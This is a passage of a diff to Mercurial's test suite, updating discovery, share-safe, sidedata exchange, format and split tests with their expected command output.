+ query 2; still undecided: 1080, sample size is: 50
sampling from both directions
searching: 3 queries
- query 3; still undecided: 980, sample size is: 200
+ query 3; still undecided: 1030, sample size is: 200
sampling from both directions
searching: 4 queries
- query 4; still undecided: 497, sample size is: 210
+ query 4; still undecided: 547, sample size is: 210
sampling from both directions
searching: 5 queries
- query 5; still undecided: 285, sample size is: 220
+ query 5; still undecided: 336, sample size is: 220
sampling from both directions
searching: 6 queries
- query 6; still undecided: 63, sample size is: 63
+ query 6; still undecided: 114, sample size is: 114
6 total queries in *.????s (glob)
elapsed time: * seconds (glob)
round-trips: 6
@@ -1412,22 +1412,30 @@
missing: 1040
common heads: 3ee37d65064a
- $ hg -R a debugdiscovery b --debug --config devel.discovery.exchange-heads=false --config devel.discovery.randomize=false --config devel.discovery.grow-sample.rate=1.01
+ $ hg -R a debugdiscovery b --debug --config devel.discovery.exchange-heads=false --config devel.discovery.randomize=false --config devel.discovery.grow-sample.rate=1.20 --config devel.discovery.sample-size=50
comparing with b
searching for changes
sampling from both directions
- query 1; still undecided: 1340, sample size is: 200
+ query 1; still undecided: 1340, sample size is: 50
+ sampling from both directions
+ query 2; still undecided: 995, sample size is: 60
sampling from both directions
- query 2; still undecided: 795, sample size is: 202
+ query 3; still undecided: 913, sample size is: 72
sampling from both directions
- query 3; still undecided: 525, sample size is: 204
+ query 4; still undecided: 816, sample size is: 204
+ sampling from both directions
+ query 5; still undecided: 612, sample size is: 153
sampling from both directions
- query 4; still undecided: 252, sample size is: 206
+ query 6; still undecided: 456, sample size is: 123
+ sampling from both directions
+ query 7; still undecided: 332, sample size is: 147
sampling from both directions
- query 5; still undecided: 44, sample size is: 44
- 5 total queries in *s (glob)
- elapsed time: * seconds (glob)
- round-trips: 5
+ query 8; still undecided: 184, sample size is: 176
+ sampling from both directions
+ query 9; still undecided: 8, sample size is: 8
+ 9 total queries in *s (glob)
+ elapsed time: * seconds (glob)
+ round-trips: 9
heads summary:
total common heads: 1
also local heads: 0
@@ -1580,3 +1588,175 @@
common: 0
missing: 1
common heads: 66f7d451a68b
+
+ $ cd ..
+
+
+Test debuging discovery using different subset of the same repository
+=====================================================================
+
+remote is a local subset
+------------------------
+
+remote will be last 25 heads of the local graph
+
+ $ cd $TESTTMP/manyheads
+ $ hg -R a debugdiscovery \
+ > --debug \
+ > --remote-as-revs 'last(heads(all()), 25)' \
+ > --config devel.discovery.randomize=false
+ query 1; heads
+ searching for changes
+ all remote heads known locally
+ elapsed time: * seconds (glob)
+ round-trips: 1
+ heads summary:
+ total common heads: 25
+ also local heads: 25
+ also remote heads: 25
+ both: 25
+ local heads: 260
+ common: 25
+ missing: 235
+ remote heads: 25
+ common: 25
+ unknown: 0
+ local changesets: 1340
+ common: 400
+ heads: 25
+ roots: 1
+ missing: 940
+ heads: 235
+ roots: 235
+ first undecided set: 940
+ heads: 235
+ roots: 235
+ common: 0
+ missing: 940
+ common heads: 0dfd965d91c6 0fe09b60448d 14a17233ce9d 175c0a3072cf 1c51e2c80832 1e51600e0698 24eb5f9bdbab 25ce09526613 36bd00abde57 426989fdefa0 596d87362679 5dd1039ea5c0 5ef24f022278 5f230dc19419 80b39998accb 88f40688ffb5 9e37ddf8c632 abf4d55b075e b2ce801fddfe b368b6ac3ce3 c959bf2e869c c9fba6ba4e2e d783207cf649 d9a51e256f21 e3717a4e3753
+
+local is a local subset
+------------------------
+
+remote will be last 25 heads of the local graph
+
+ $ cd $TESTTMP/manyheads
+ $ hg -R a debugdiscovery b \
+ > --debug \
+ > --local-as-revs 'first(heads(all()), 25)' \
+ > --config devel.discovery.randomize=false
+ comparing with b
+ query 1; heads
+ searching for changes
+ taking quick initial sample
+ query 2; still undecided: 375, sample size is: 81
+ sampling from both directions
+ query 3; still undecided: 3, sample size is: 3
+ 3 total queries *s (glob)
+ elapsed time: * seconds (glob)
+ round-trips: 3
+ heads summary:
+ total common heads: 1
+ also local heads: 0
+ also remote heads: 0
+ both: 0
+ local heads: 25
+ common: 0
+ missing: 25
+ remote heads: 1
+ common: 0
+ unknown: 1
+ local changesets: 400
+ common: 300
+ heads: 1
+ roots: 1
+ missing: 100
+ heads: 25
+ roots: 25
+ first undecided set: 400
+ heads: 25
+ roots: 1
+ common: 300
+ missing: 100
+ common heads: 3ee37d65064a
+
+both local and remove are subset
+------------------------
+
+remote will be last 25 heads of the local graph
+
+ $ cd $TESTTMP/manyheads
+ $ hg -R a debugdiscovery \
+ > --debug \
+ > --local-as-revs 'first(heads(all()), 25)' \
+ > --remote-as-revs 'last(heads(all()), 25)' \
+ > --config devel.discovery.randomize=false
+ query 1; heads
+ searching for changes
+ taking quick initial sample
+ query 2; still undecided: 375, sample size is: 81
+ sampling from both directions
+ query 3; still undecided: 3, sample size is: 3
+ 3 total queries in *s (glob)
+ elapsed time: * seconds (glob)
+ round-trips: 3
+ heads summary:
+ total common heads: 1
+ also local heads: 0
+ also remote heads: 0
+ both: 0
+ local heads: 25
+ common: 0
+ missing: 25
+ remote heads: 25
+ common: 0
+ unknown: 25
+ local changesets: 400
+ common: 300
+ heads: 1
+ roots: 1
+ missing: 100
+ heads: 25
+ roots: 25
+ first undecided set: 400
+ heads: 25
+ roots: 1
+ common: 300
+ missing: 100
+ common heads: 3ee37d65064a
+
+Test -T json output
+-------------------
+
+ $ hg -R a debugdiscovery \
+ > -T json \
+ > --debug \
+ > --local-as-revs 'first(heads(all()), 25)' \
+ > --remote-as-revs 'last(heads(all()), 25)' \
+ > --config devel.discovery.randomize=false
+ [
+ {
+ "elapsed": *, (glob)
+ "nb-common-heads": 1,
+ "nb-common-heads-both": 0,
+ "nb-common-heads-local": 0,
+ "nb-common-heads-remote": 0,
+ "nb-common-roots": 1,
+ "nb-head-local": 25,
+ "nb-head-local-missing": 25,
+ "nb-head-remote": 25,
+ "nb-head-remote-unknown": 25,
+ "nb-ini_und": 400,
+ "nb-ini_und-common": 300,
+ "nb-ini_und-heads": 25,
+ "nb-ini_und-missing": 100,
+ "nb-ini_und-roots": 1,
+ "nb-missing-heads": 25,
+ "nb-missing-roots": 25,
+ "nb-revs": 400,
+ "nb-revs-common": 300,
+ "nb-revs-missing": 100,
+ "output": "query 1; heads\nsearching for changes\ntaking quick initial sample\nquery 2; still undecided: 375, sample size is: 81\nsampling from both directions\nquery 3; still undecided: 3, sample size is: 3\n3 total queries in *s\n", (glob)
+ "total-roundtrips": 3
+ }
+ ]
--- a/tests/test-share-bookmarks.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-share-bookmarks.t Tue Apr 20 11:01:06 2021 -0400
@@ -102,7 +102,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
$ hg book bm1
FYI, in contrast to above test, bmX is invisible in repo1 (= shared
@@ -127,7 +127,7 @@
transaction abort!
rollback completed
abort: pretxnclose hook exited with status 1
- [255]
+ [40]
$ hg book bm3
clean up bm2 since it's uninteresting (not shared in the vfs case and
@@ -249,7 +249,7 @@
no changes found
adding remote bookmark bm3
abort: forced failure by extension
- [255]
+ [40]
$ hg boo
bm1 3:b87954705719
bm4 5:92793bfc8cad
--- a/tests/test-share-safe.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-share-safe.t Tue Apr 20 11:01:06 2021 -0400
@@ -7,6 +7,11 @@
> use-share-safe = True
> [storage]
> revlog.persistent-nodemap.slow-path=allow
+ > # enforce zlib to ensure we can upgrade to zstd later
+ > [format]
+ > revlog-compression=zlib
+ > # we want to be able to enable it later
+ > use-persistent-nodemap=no
> EOF
prepare source repo
@@ -352,18 +357,27 @@
- changelog
- manifest
- $ hg debugupgraderepo --run -q
+ $ hg debugupgraderepo --run
upgrade will perform the following actions:
requirements
preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
added: share-safe
+ share-safe
+ Upgrades a repository to share-safe format so that future shares of this repository share its requirements and configs.
+
processed revlogs:
- all-filelogs
- changelog
- manifest
+ beginning upgrade...
+ repository locked and read-only
+ creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob)
+ (it is safe to interrupt this process any time before data migration completes)
+ upgrading repository requirements
+ removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob)
repository upgraded to share safe mode, existing shares will still work in old non-safe mode. Re-share existing shares to use them in safe mode New shares will be created in safe mode.
$ hg debugrequirements
@@ -433,7 +447,7 @@
- changelog
- manifest
- $ hg debugupgraderepo -q --run
+ $ hg debugupgraderepo --run
upgrade will perform the following actions:
requirements
@@ -445,6 +459,12 @@
- changelog
- manifest
+ beginning upgrade...
+ repository locked and read-only
+ creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob)
+ (it is safe to interrupt this process any time before data migration completes)
+ upgrading repository requirements
+ removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob)
repository downgraded to not use share safe mode, existing shares will not work and needs to be reshared.
$ hg debugrequirements
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-sidedata-exchange.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,473 @@
+===========================
+Tests for sidedata exchange
+===========================
+
+Check simple exchange behavior
+==============================
+
+Pusher and pushed have sidedata enabled
+---------------------------------------
+
+ $ hg init sidedata-source --config format.exp-use-side-data=yes
+ $ cat << EOF >> sidedata-source/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py
+ > EOF
+ $ hg init sidedata-target --config format.exp-use-side-data=yes
+ $ cat << EOF >> sidedata-target/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py
+ > EOF
+ $ cd sidedata-source
+ $ echo a > a
+ $ echo b > b
+ $ echo c > c
+ $ hg commit -Am "initial"
+ adding a
+ adding b
+ adding c
+ $ echo aa > a
+ $ hg commit -m "other"
+ $ hg push -r . ../sidedata-target
+ pushing to ../sidedata-target
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 4 changes to 3 files
+ $ hg -R ../sidedata-target debugsidedata -c 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg -R ../sidedata-target debugsidedata -c 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x00:'
+ entry-0002 size 32
+ '\xa3\xee4v\x99\x85$\x9f\x1f\x8dKe\x0f\xc3\x9d-\xc9\xb5%[\x15=h\xe9\xf2O\xb5\xd9\x1f*\xff\xe5'
+ $ hg -R ../sidedata-target debugsidedata -m 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg -R ../sidedata-target debugsidedata -m 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x00\x81'
+ entry-0002 size 32
+ '-bL\xc5\xa4uu"#\xac\x1b`,\xc0\xbc\x9d\xf5\xac\xf0\x1d\x89)2\xf8N\xb1\x14m\xce\xd7\xbc\xae'
+ $ hg -R ../sidedata-target debugsidedata a 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg -R ../sidedata-target debugsidedata a 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x00\x03'
+ entry-0002 size 32
+ '\xd9\xcd\x81UvL5C\xf1\x0f\xad\x8aH\rt17Fo\x8dU!<\x8e\xae\xfc\xd1/\x06\xd4:\x80'
+ $ cd ..
+
+Puller and pulled have sidedata enabled
+---------------------------------------
+
+ $ rm -rf sidedata-source sidedata-target
+ $ hg init sidedata-source --config format.exp-use-side-data=yes
+ $ cat << EOF >> sidedata-source/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py
+ > EOF
+ $ hg init sidedata-target --config format.exp-use-side-data=yes
+ $ cat << EOF >> sidedata-target/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py
+ > EOF
+ $ cd sidedata-source
+ $ echo a > a
+ $ echo b > b
+ $ echo c > c
+ $ hg commit -Am "initial"
+ adding a
+ adding b
+ adding c
+ $ echo aa > a
+ $ hg commit -m "other"
+ $ hg pull -R ../sidedata-target ../sidedata-source
+ pulling from ../sidedata-source
+ requesting all changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 4 changes to 3 files
+ new changesets 05da661850d7:7ec8b4049447
+ (run 'hg update' to get a working copy)
+ $ hg -R ../sidedata-target debugsidedata -c 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg -R ../sidedata-target debugsidedata -c 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x00:'
+ entry-0002 size 32
+ '\xa3\xee4v\x99\x85$\x9f\x1f\x8dKe\x0f\xc3\x9d-\xc9\xb5%[\x15=h\xe9\xf2O\xb5\xd9\x1f*\xff\xe5'
+ $ hg -R ../sidedata-target debugsidedata -m 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg -R ../sidedata-target debugsidedata -m 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x00\x81'
+ entry-0002 size 32
+ '-bL\xc5\xa4uu"#\xac\x1b`,\xc0\xbc\x9d\xf5\xac\xf0\x1d\x89)2\xf8N\xb1\x14m\xce\xd7\xbc\xae'
+ $ hg -R ../sidedata-target debugsidedata a 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg -R ../sidedata-target debugsidedata a 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x00\x03'
+ entry-0002 size 32
+ '\xd9\xcd\x81UvL5C\xf1\x0f\xad\x8aH\rt17Fo\x8dU!<\x8e\xae\xfc\xd1/\x06\xd4:\x80'
+ $ cd ..
+
+Now on to asymmetric configs.
+
+Pusher has sidedata enabled, pushed does not
+--------------------------------------------
+
+ $ rm -rf sidedata-source sidedata-target
+ $ hg init sidedata-source --config format.exp-use-side-data=yes
+ $ cat << EOF >> sidedata-source/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py
+ > EOF
+ $ hg init sidedata-target --config format.exp-use-side-data=no
+ $ cd sidedata-source
+ $ echo a > a
+ $ echo b > b
+ $ echo c > c
+ $ hg commit -Am "initial"
+ adding a
+ adding b
+ adding c
+ $ echo aa > a
+ $ hg commit -m "other"
+ $ hg push -r . ../sidedata-target --traceback
+ pushing to ../sidedata-target
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 4 changes to 3 files
+ $ hg -R ../sidedata-target log -G
+ o changeset: 1:7ec8b4049447
+ | tag: tip
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: other
+ |
+ o changeset: 0:05da661850d7
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: initial
+
+
+ $ hg -R ../sidedata-target debugsidedata -c 0
+ $ hg -R ../sidedata-target debugsidedata -c 1 -v
+ $ hg -R ../sidedata-target debugsidedata -m 0
+ $ hg -R ../sidedata-target debugsidedata -m 1 -v
+ $ hg -R ../sidedata-target debugsidedata a 0
+ $ hg -R ../sidedata-target debugsidedata a 1 -v
+ $ cd ..
+
+Pulled has sidedata enabled, puller does not
+--------------------------------------------
+
+ $ rm -rf sidedata-source sidedata-target
+ $ hg init sidedata-source --config format.exp-use-side-data=yes
+ $ cat << EOF >> sidedata-source/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py
+ > EOF
+ $ hg init sidedata-target --config format.exp-use-side-data=no
+ $ cd sidedata-source
+ $ echo a > a
+ $ echo b > b
+ $ echo c > c
+ $ hg commit -Am "initial"
+ adding a
+ adding b
+ adding c
+ $ echo aa > a
+ $ hg commit -m "other"
+ $ hg pull -R ../sidedata-target ../sidedata-source
+ pulling from ../sidedata-source
+ requesting all changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 4 changes to 3 files
+ new changesets 05da661850d7:7ec8b4049447
+ (run 'hg update' to get a working copy)
+ $ hg -R ../sidedata-target log -G
+ o changeset: 1:7ec8b4049447
+ | tag: tip
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: other
+ |
+ o changeset: 0:05da661850d7
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: initial
+
+
+ $ hg -R ../sidedata-target debugsidedata -c 0
+ $ hg -R ../sidedata-target debugsidedata -c 1 -v
+ $ hg -R ../sidedata-target debugsidedata -m 0
+ $ hg -R ../sidedata-target debugsidedata -m 1 -v
+ $ hg -R ../sidedata-target debugsidedata a 0
+ $ hg -R ../sidedata-target debugsidedata a 1 -v
+ $ cd ..
+
+
+Check sidedata exchange with on-the-fly generation and removal
+==============================================================
+
+(Push) Target has strict superset of the source
+-----------------------------------------------
+
+ $ hg init source-repo --config format.exp-use-side-data=yes
+ $ hg init target-repo --config format.exp-use-side-data=yes
+ $ cat << EOF >> target-repo/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata.py
+ > EOF
+ $ cd source-repo
+ $ echo aaa > a
+ $ hg add a
+ $ hg commit -m a
+ $ echo aaa > b
+ $ hg add b
+ $ hg commit -m b
+ $ echo xxx >> a
+ $ hg commit -m aa
+
+No sidedata is generated in the source
+ $ hg debugsidedata -c 0
+
+Check that sidedata capabilities are advertised
+ $ hg debugcapabilities ../target-repo | grep sidedata
+ exp-wanted-sidedata=1,2
+
+We expect the client to abort the push since it's not capable of generating
+what the server is asking
+ $ hg push -r . ../target-repo
+ pushing to ../target-repo
+ abort: cannot push: required sidedata category not supported by this client: '1'
+ [255]
+
+Add the required capabilities
+ $ cat << EOF >> .hg/hgrc
+ > [extensions]
+ > testsidedata2=$TESTDIR/testlib/ext-sidedata-2.py
+ > EOF
+
+We expect the target to have sidedata that was generated by the source on push
+ $ hg push -r . ../target-repo
+ pushing to ../target-repo
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 3 changesets with 3 changes to 2 files
+ $ cd ../target-repo
+ $ hg debugsidedata -c 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg debugsidedata -c 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x006'
+ entry-0002 size 32
+ '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde'
+ $ hg debugsidedata -m 2
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg debugsidedata a 1
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ cd ..
+
+(Push) Difference is not subset/superset
+----------------------------------------
+
+Source has one in common, one missing and one more sidedata category with the
+target.
+
+ $ rm -rf source-repo target-repo
+ $ hg init source-repo --config format.exp-use-side-data=yes
+ $ cat << EOF >> source-repo/.hg/hgrc
+ > [extensions]
+ > testsidedata3=$TESTDIR/testlib/ext-sidedata-3.py
+ > EOF
+ $ hg init target-repo --config format.exp-use-side-data=yes
+ $ cat << EOF >> target-repo/.hg/hgrc
+ > [extensions]
+ > testsidedata4=$TESTDIR/testlib/ext-sidedata-4.py
+ > EOF
+ $ cd source-repo
+ $ echo aaa > a
+ $ hg add a
+ $ hg commit -m a
+ $ echo aaa > b
+ $ hg add b
+ $ hg commit -m b
+ $ echo xxx >> a
+ $ hg commit -m aa
+
+Check that sidedata capabilities are advertised
+ $ hg debugcapabilities . | grep sidedata
+ exp-wanted-sidedata=1,2
+ $ hg debugcapabilities ../target-repo | grep sidedata
+ exp-wanted-sidedata=2,3
+
+Sidedata is generated in the source, but only the right categories (entry-0001 and entry-0002)
+ $ hg debugsidedata -c 0
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg debugsidedata -c 1 -v
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x006'
+ entry-0002 size 32
+ '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde'
+ $ hg debugsidedata -m 2
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg debugsidedata a 1
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+
+
+We expect the target to have sidedata that was generated by the source on push,
+and also removed the sidedata categories that are not supported by the target.
+Namely, we expect entry-0002 (only exchanged) and entry-0003 (generated),
+but not entry-0001.
+
+ $ hg push -r . ../target-repo --traceback
+ pushing to ../target-repo
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 3 changesets with 3 changes to 2 files
+ $ cd ../target-repo
+ $ hg log -G
+ o changeset: 2:40f977031323
+ | tag: tip
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: aa
+ |
+ o changeset: 1:2707720c6597
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: b
+ |
+ o changeset: 0:7049e48789d7
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: a
+
+ $ hg debugsidedata -c 0
+ 2 sidedata entries
+ entry-0002 size 32
+ entry-0003 size 48
+ $ hg debugsidedata -c 1 -v
+ 2 sidedata entries
+ entry-0002 size 32
+ '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde'
+ entry-0003 size 48
+ '\x87\xcf\xdfI/\xb5\xed\xeaC\xc1\xf0S\xf3X\x1c\xcc\x00m\xee\xe6#\xc1\xe3\xcaB8Fk\x82e\xfc\xc01\xf6\xb7\xb9\xb3([\xf6D\xa6\xcf\x9b\xea\x11{\x08'
+ $ hg debugsidedata -m 2
+ 2 sidedata entries
+ entry-0002 size 32
+ entry-0003 size 48
+ $ hg debugsidedata a 1
+ 2 sidedata entries
+ entry-0002 size 32
+ entry-0003 size 48
+ $ cd ..
+
+(Pull) Target has strict superset of the source
+-----------------------------------------------
+
+ $ rm -rf source-repo target-repo
+ $ hg init source-repo --config format.exp-use-side-data=yes
+ $ hg init target-repo --config format.exp-use-side-data=yes
+ $ cat << EOF >> target-repo/.hg/hgrc
+ > [extensions]
+ > testsidedata=$TESTDIR/testlib/ext-sidedata.py
+ > EOF
+ $ cd source-repo
+ $ echo aaa > a
+ $ hg add a
+ $ hg commit -m a
+ $ echo aaa > b
+ $ hg add b
+ $ hg commit -m b
+ $ echo xxx >> a
+ $ hg commit -m aa
+
+No sidedata is generated in the source
+ $ hg debugsidedata -c 0
+
+Check that sidedata capabilities are advertised
+ $ hg debugcapabilities ../target-repo | grep sidedata
+ exp-wanted-sidedata=1,2
+
+ $ cd ../target-repo
+
+Add the required capabilities
+ $ cat << EOF >> .hg/hgrc
+ > [extensions]
+ > testsidedata2=$TESTDIR/testlib/ext-sidedata-2.py
+ > EOF
+
+We expect the target to have sidedata that it generated on-the-fly during pull
+ $ hg pull -r . ../source-repo --traceback
+ pulling from ../source-repo
+ adding changesets
+ adding manifests
+ adding file changes
+ added 3 changesets with 3 changes to 2 files
+ new changesets 7049e48789d7:40f977031323
+ (run 'hg update' to get a working copy)
+ $ hg debugsidedata -c 0 --traceback
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg debugsidedata -c 1 -v --traceback
+ 2 sidedata entries
+ entry-0001 size 4
+ '\x00\x00\x006'
+ entry-0002 size 32
+ '\x98\t\xf9\xc4v\xf0\xc5P\x90\xf7wRf\xe8\xe27e\xfc\xc1\x93\xa4\x96\xd0\x1d\x97\xaaG\x1d\xd7t\xfa\xde'
+ $ hg debugsidedata -m 2
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ hg debugsidedata a 1
+ 2 sidedata entries
+ entry-0001 size 4
+ entry-0002 size 32
+ $ cd ..
--- a/tests/test-sidedata.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-sidedata.t Tue Apr 20 11:01:06 2021 -0400
@@ -56,11 +56,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ hg debugformat -v -R up-no-side-data --config format.exp-use-side-data=yes
format-variant repo config default
@@ -69,11 +71,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no yes no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no yes no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ hg debugupgraderepo -R up-no-side-data --config format.exp-use-side-data=yes > /dev/null
@@ -88,11 +92,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: yes no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ hg debugformat -v -R up-side-data --config format.exp-use-side-data=no
format-variant repo config default
@@ -101,10 +107,12 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: yes no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ hg debugupgraderepo -R up-side-data --config format.exp-use-side-data=no > /dev/null
--- a/tests/test-simplemerge.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-simplemerge.py Tue Apr 20 11:01:06 2021 -0400
@@ -141,8 +141,6 @@
"""No conflicts because nothing changed"""
m3 = Merge3([b'aaa', b'bbb'], [b'aaa', b'bbb'], [b'aaa', b'bbb'])
- self.assertEqual(m3.find_unconflicted(), [(0, 2)])
-
self.assertEqual(
list(m3.find_sync_regions()),
[(0, 2, 0, 2, 0, 2), (2, 2, 2, 2, 2, 2)],
@@ -189,8 +187,6 @@
[b'aaa', b'bbb'], [b'aaa', b'111', b'bbb'], [b'aaa', b'bbb']
)
- self.assertEqual(m3.find_unconflicted(), [(0, 1), (1, 2)])
-
self.assertEqual(
list(m3.find_sync_regions()),
[(0, 1, 0, 1, 0, 1), (1, 2, 2, 3, 1, 2), (2, 2, 3, 3, 2, 2)],
@@ -271,8 +267,6 @@
[b'aaa\n', b'222\n', b'bbb\n'],
)
- self.assertEqual(m3.find_unconflicted(), [(0, 1), (1, 2)])
-
self.assertEqual(
list(m3.find_sync_regions()),
[(0, 1, 0, 1, 0, 1), (1, 2, 2, 3, 2, 3), (2, 2, 3, 3, 3, 3)],
@@ -323,8 +317,6 @@
[b'aaa', b'222', b'bbb'],
)
- self.assertEqual(m3.find_unconflicted(), [(0, 1), (2, 3)])
-
self.assertEqual(
list(m3.find_sync_regions()),
[(0, 1, 0, 1, 0, 1), (2, 3, 2, 3, 2, 3), (3, 3, 3, 3, 3, 3)],
@@ -338,8 +330,6 @@
[b'aaa', b'222', b'222', b'222', b'222', b'bbb'],
)
- self.assertEqual(m3.find_unconflicted(), [(0, 1), (3, 4)])
-
self.assertEqual(
list(m3.find_sync_regions()),
[(0, 1, 0, 1, 0, 1), (3, 4, 4, 5, 5, 6), (4, 4, 5, 5, 6, 6)],
--- a/tests/test-sparse-requirement.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-sparse-requirement.t Tue Apr 20 11:01:06 2021 -0400
@@ -20,6 +20,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -38,6 +40,8 @@
exp-sparse
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
@@ -57,6 +61,8 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
+ revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
store
--- a/tests/test-split.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-split.t Tue Apr 20 11:01:06 2021 -0400
@@ -1046,3 +1046,101 @@
[ ui.warning|rollback completed]
[ ui.error|abort: empty commit message]
[10]
+
+Test that creating an empty split or "no-op"
+(identical to original) commit doesn't cause chaos
+--------------------------------------------------
+
+ $ hg init $TESTTMP/noop
+ $ cd $TESTTMP/noop
+ $ echo r0 > r0
+ $ hg ci -qAm r0
+ $ hg phase -p
+ $ echo foo > foo
+ $ hg ci -qAm foo
+ $ hg log -G -T'{phase} {rev}:{node|short} {desc}'
+ @ draft 1:ae694b2901bb foo
+ |
+ o public 0:222799e2f90b r0
+
+ $ printf 'd\na\n' | HGEDITOR=cat hg split || true
+ diff --git a/foo b/foo
+ new file mode 100644
+ examine changes to 'foo'?
